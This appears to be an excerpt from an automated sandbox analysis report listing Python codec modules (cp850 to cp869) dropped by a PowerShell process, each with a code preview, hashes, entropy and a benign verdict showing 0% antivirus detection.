                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP850.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp850',.. encode=Codec().encode,..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):35700
                                                                                                                                                                                                                      Entropy (8bit):4.529290225811869
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:SHLsuYDvRzgbY6oxCzhnfnh7gwrE0PXRN/h4wcuSMyLLUhmCIbp0w449jBRWJn4d:vgCkjh4wVy/xHWJn4AV9dQr
                                                                                                                                                                                                                      MD5:BB2BA9443AE7BD887BA8EAC3E622366A
                                                                                                                                                                                                                      SHA1:777E47CA86C4CF65DA68603DDACD6C78B89E0DC7
                                                                                                                                                                                                                      SHA-256:8B6AD769607B3DB0D60E4BA1A6321A3823AD8460890D48C816220DCDF8CBEA98
                                                                                                                                                                                                                      SHA-512:EBAEC3C9AB014DD4B9629DF511D5E98A9CC88F4035841756142AFC462AB00D07B92050F62C89CF7B2C4891E7D4165F3B3C78548062AACE86E4680C6E2FF3F996
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP852.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp852',.. encode=Codec().encode,..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):34548
                                                                                                                                                                                                                      Entropy (8bit):4.55461632698867
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:PHLsuYDvR+mIj30FeMwrE0PXRN/h4wcuSM2fi+ypK2449jBRWJn4bkVd8nOiB6HL:i+0rkjh4wV8iN3HWJn4AVd8n0r
                                                                                                                                                                                                                      MD5:7C84762C6FD5251CD237754FEB1752D4
                                                                                                                                                                                                                      SHA1:B4F083D0AC32E26B77DB2E99F53C079DB7B844A1
                                                                                                                                                                                                                      SHA-256:F4F47A5CF3FE5A8CD269B68A73C1DC293A75CD3B9C0489CFA600919B47B35A4C
                                                                                                                                                                                                                      SHA-512:D841B04E354ADD8C3D337A6952163CDC8D74FE8F561418A8DEA9C7C5986EE15179F9F5B2336880ABD279CE45AA46CB55020EDE9CDF0FE8B7EA093D1033B5F108
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP855.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp855',.. encode=Codec().encode,..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):12730
                                                                                                                                                                                                                      Entropy (8bit):4.6600353742865055
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:JgHhsuOTDvRPUrXPLouhIAs2+i+/4mwNLlYip2MUo8ONT:jT5uhIAlg02MH
                                                                                                                                                                                                                      MD5:EE5A43420B08D06B0B2D72A49F00216D
                                                                                                                                                                                                                      SHA1:5CAB8D55CB2910C092AF40C921E0B0959933C216
                                                                                                                                                                                                                      SHA-256:F0C9DAC1B08D688B81B4F11CA603336FBD5C7FC4C1A30E8B7836283C2AD9A8E7
                                                                                                                                                                                                                      SHA-512:97CC6127C21CF49679AD8AC1B47D22D674A07D83BDCD7FAB54B3C821F8DC531435F3B12EE63222C92E3A9D6895404BA857926BA2CA52CDB1BD3ED51B49009C65
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp856 generated from 'MAPPINGS/VENDORS/MISC/CP856.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp856',.. encode=Cod
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):34602
                                                                                                                                                                                                                      Entropy (8bit):4.528500526287676
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:BHLsuYDvR8LmUdMAJZjy5xSwrE0PXRN/h4wcuSMMksbYevMScnepGW449jBRWJn+:4FAcSkjh4wVMuecebHWJn4AVk2Yr
                                                                                                                                                                                                                      MD5:DD1F84F2921D49CF944DF4BCF6ECF7E8
                                                                                                                                                                                                                      SHA1:7EEE7B6CAA8120C4D26E96FCCC21C4474BD2652A
                                                                                                                                                                                                                      SHA-256:8AE4CB6989342105C513678480ECBDF2D5D8E534E69704964D0FB4D2A960039B
                                                                                                                                                                                                                      SHA-512:92DB4E13E84876B51B2600F503C56857E96F06A1F23C327762372F97628C766B0E524568672FBF3BA07B26A4284C1AEB522BD433F3ABB9704CF9277157B95832
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP857.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp857',.. encode=Codec().encode,..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):34713
                                                                                                                                                                                                                      Entropy (8bit):4.518245366498134
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:CLsuYDvR9SUpAJZjJBIX6l6xSwrE0PXRN/h4wcuSM5kw9evMStmxNpGf6w6F4490:3jAYSkjh4wV5j9e2THWJn4AVgq/r
                                                                                                                                                                                                                      MD5:F0B8B1B55A90C1EA058759AD18834A75
                                                                                                                                                                                                                      SHA1:FD7AFDDE40956991241D6130F72A40D1C655B15B
                                                                                                                                                                                                                      SHA-256:04A67B43EFA1E0CE2D80791C290BC2C8EA01C3991EB3DF37528B1DD575B12330
                                                                                                                                                                                                                      SHA-512:72F7905616B3B3F9D961E4A605B15A8B9D427E13A82B1BA9AC1F2380E961DE6848A9C5068A57DE6CF62E0CEC5D9E6C2D7310F906D0EC16CAC345E48AA1ABF352
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec for CP858, modified from cp850....."""....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp858',.. encode=Codec().encode,.. decode=Codec().decode,..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):35379
                                                                                                                                                                                                                      Entropy (8bit):4.587856666654445
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:/HLsuYDvRGYj/bXdiaYzIUqwrE0PXRN/h4wcuSMBmkwNvuD8HtIMpWZEt449jBRq:SfnZkjh4wVMjNjxAEJHWJn4AVWIcOMy
                                                                                                                                                                                                                      MD5:1F0B22586EC65A59C966A709024E35E4
                                                                                                                                                                                                                      SHA1:143BCD55359AD3B9506D6583D04A8C1BF32366BD
                                                                                                                                                                                                                      SHA-256:E2B8B4B2658ECC3DC53D4B0760AEA95517BE298FAFBFA69574B08933747922BE
                                                                                                                                                                                                                      SHA-512:7859FBC58DD5B68614F3F83DA28AA600E86A6F2DB7E011870B212E4D721478A8028D893AB666212DA1B1D38D41BB9E03B985C555154E33A20D71D2449DE7FDF2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP860.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp860',.. encode=Codec().encode,..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):35331
                                                                                                                                                                                                                      Entropy (8bit):4.588014438980019
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:FfLnZkjh4wVlPVjxAEJHWJn4AVPScqPMy:JqjhJVbxAEJ2BFDS
                                                                                                                                                                                                                      MD5:83CFB87E2BB8A42739A03DA1D979AF6A
                                                                                                                                                                                                                      SHA1:97C16F469B56F437F521C482C613D4AEC6EF3206
                                                                                                                                                                                                                      SHA-256:D7FE52A55FDCAC4E6E9ECDC4884C793D1FEB345D0276B074214DB1BF4BCF3033
                                                                                                                                                                                                                      SHA-512:589B6933A5E45176210EA18997B056F41A6B03D765668B7328577D5CF8EEC9CF55B6247E225835D4666EB2AA0714ED927902929B75E27711437612BF9463D89E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP861.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp861',.. encode=Codec().encode,..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):34068
                                                                                                                                                                                                                      Entropy (8bit):4.605627535144471
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:oPFL+DZkjh4wVOjIVjx79EJHWJn4AVE6AsqPMy:8UDqjhJVkKx79EJ2BFX7S
                                                                                                                                                                                                                      MD5:D22ABCA28D2425D802F53021178224A1
                                                                                                                                                                                                                      SHA1:D26E991DA020C07E58C03506347803A88230A6BB
                                                                                                                                                                                                                      SHA-256:6D99C0415136CE45AB438C8238772A1A132E7B38212C623467C2170F1A8AAE75
                                                                                                                                                                                                                      SHA-512:66E7C898ED749CF2706EA877FB099F50477EC5EA3C0FB4F2FA189F4E849D37AD01E7899BFC04A3D60D6CD5A1D42CFF69E71D0A39BE5F51C919543D22C2D82C6A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP862.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp862',.. encode=Codec().encode,..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):34950
                                                                                                                                                                                                                      Entropy (8bit):4.597040843450106
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:DQ6LHZkjh4wV5VvxAEJHWJn4AV7qmqPMy:VqjhJVjxAEJ2BFtS
                                                                                                                                                                                                                      MD5:13279C9ED7C1F7AF8722F9EB3A1B595B
                                                                                                                                                                                                                      SHA1:BCF042EA7D75E802EE940B3C979626DCD0FAAD33
                                                                                                                                                                                                                      SHA-256:32FC23645A773EBB3247B3692D0525EA43513B358DD0350EF3A171864E326335
                                                                                                                                                                                                                      SHA-512:95CDDCB21D1E738A6850BEA50F6ABD8BBC537F916AC1B3BC16449710EECCDD6B9A54A584A6E40F89E3068B601F43EB297214B1585C9F658B7901BE8F1CBB5162
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP863.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp863',.. encode=Codec().encode,..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):34353
                                                                                                                                                                                                                      Entropy (8bit):4.587380932355719
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:THLsuYDvRKLaH2bdfn8yrE0PXRQ/h4wcuSMurHUF3zZUB+yEsqj44HjBRWJn4bkg:On2quKh4wVU2HWJn4AVXwn
                                                                                                                                                                                                                      MD5:30CBEC79DA2D6565A1C62EF240272223
                                                                                                                                                                                                                      SHA1:00C4D427BBE2ADEC7FD3EB73C4F025523D352EA6
                                                                                                                                                                                                                      SHA-256:E8879DB3682B0F234BFCF97FE74A3A7DB63CFD5F40281F580E911932DEC4A4D3
                                                                                                                                                                                                                      SHA-512:69191F9A4D7089C74A5CA459D0A325BD21347AAC6CAA7F2D4DBE7835A73CD31CCD23C395B11ED91AB55C1592456C7D39A6F3D2CBF1CD2338A27B921A41435864
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP864.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp864',.. encode=Codec().encode,..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):35316
                                                                                                                                                                                                                      Entropy (8bit):4.589958887283082
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:RQVLCZkjh4wVXjIVSxAEJHWJn4AVUVcqPMy:PqjhJVz5xAEJ2BFfS
                                                                                                                                                                                                                      MD5:FE9E2A87FF8164A9602AF05FE30F64FC
                                                                                                                                                                                                                      SHA1:3BEC0843F48826EC25A9D660B9A578148085D82F
                                                                                                                                                                                                                      SHA-256:0722BBF3A0F93700E99B3816E9E52C75674E14319146F9AC3FD1E17F87E66CB0
                                                                                                                                                                                                                      SHA-512:B1C5797EC453694C0E285084F25B7825C13C59B2754DE58319745923784BB5105485883C6E8BDDFEAC3267EE8E9CDD34A76155282C2AD774CEF58FBC6AC476FC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP865.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp865',.. encode=Codec().encode,..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):35094
                                                                                                                                                                                                                      Entropy (8bit):4.600424943983017
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:lHLsuYDvRI0CnFdiaYzFFwrE0PXRN/h4wcuSMXY3uD8HtIMpW5449jBRWJn4bkV1:EVMYkjh4wVXYrxcHWJn4AVo0kQMy
                                                                                                                                                                                                                      MD5:BE6B4AAAD297AE734F59800072CCAA30
                                                                                                                                                                                                                      SHA1:6FE723B5DA8606EC26DC4523AA6F6EEEDACD16E0
                                                                                                                                                                                                                      SHA-256:E3A033B3B790018A0A02E9F67A03530753C7FB5F94B6ABA84F5173D29FB389AE
                                                                                                                                                                                                                      SHA-512:5E4B443A4778EAF7ECFA41E88CC259A6ABB2CCA0F578F7F72800C201D280C3AC033528EBF1043862DD64896DDEA444190FFF29C6EC7AEB6DE00B5E6C7EBAA86C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP866.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp866',.. encode=Codec().encode,..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):33654
                                                                                                                                                                                                                      Entropy (8bit):4.583176642392538
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:9XtKOodhREjkjh4wV+TRLMCXkWDoq4HWJn4AV+/S0sOkYmPr:UhR1jhJVBukWDo72BFEEN
                                                                                                                                                                                                                      MD5:FC295CB9BF854E29A7EAB588DF20A662
                                                                                                                                                                                                                      SHA1:F9D95ED00BBCB7CB89661A0BB93880BF08A70802
                                                                                                                                                                                                                      SHA-256:4322E184D3C1DFA56EDB013E895CBFB71130E7846F8F56BCAFC4C0082373CB6A
                                                                                                                                                                                                                      SHA-512:0167CC25A48AB6B09F08233CD51C8C622AF7014642BE6E9A72F37EA8C459F67CAE04DFED076E8148C512747CD775457442528F1963CE3F677FE3B5F45AD71C1B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP869.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp869',.. encode=Codec().encode,..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):12902
                                                                                                                                                                                                                      Entropy (8bit):4.624503078499216
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:KHhsuOTDvRHUrXPLouhIAs2+iRvskDCYnO00pC8i1bE:nThuhIAlX/H8iG
                                                                                                                                                                                                                      MD5:5E2C1051F63CEB3600F970937C5FC6E4
                                                                                                                                                                                                                      SHA1:062664CD22F5DC7A52E99EDCC9C5D356C2B6F841
                                                                                                                                                                                                                      SHA-256:94179E22722674527BD56386B5E9DAC5427B0F55248D1AA63E204C105DA18D8B
                                                                                                                                                                                                                      SHA-512:B6643A970DDF837CA060CB511C4AFA2E4224657450455BDAEF1980ED122791991FD13BAEFD56DE10A63FC1248EAB26478EE0B0B82B0E884FCEDD71D85DCB84F3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
